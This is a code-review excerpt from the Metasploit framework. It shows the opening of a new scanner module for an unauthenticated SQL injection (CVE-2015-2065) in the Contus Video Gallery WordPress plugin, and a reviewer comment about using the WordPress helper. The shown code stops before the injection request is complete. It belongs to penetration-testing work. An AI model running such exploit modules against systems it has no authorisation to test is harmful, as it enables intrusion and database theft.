modules/auxiliary/scanner/http/wordpress_contus_video_gallery_sqli.rb

```diff
@@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Contus Video Gallery Unauthenticated SQL Injection Scanner',
+      'Description' => %q{
+      This module attempts to exploit a UNION-based SQL injection in Contus Video
+      Gallery for Wordpress version 2.7 and likely prior in order if the instance is
+      vulnerable.
+      },
+      'Author'       =>
+        [
+          'Claudio Viviani', #discovery
+          'bperry' #metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2015-2065'],
+          [ 'WPVDB', '7793' ]
+        ],
+      'DisclosureDate' => 'Feb 24 2015'))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Target URI of the Wordpress instance', '/'])
+    ], self.class)
+  end
+
+  def run_host(ip)
+    right_marker = Rex::Text.rand_text_alpha(5)
+    left_marker = Rex::Text.rand_text_alpha(5)
+    flag = Rex::Text.rand_text_alpha(5)
+
+    vprint_status("#{peer} - Checking host")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
```

Comment:
You could use the WordPress mixin and use `wordpress_url_admin_ajax` here, remove the TARGETURI Option and the HttpClient mixin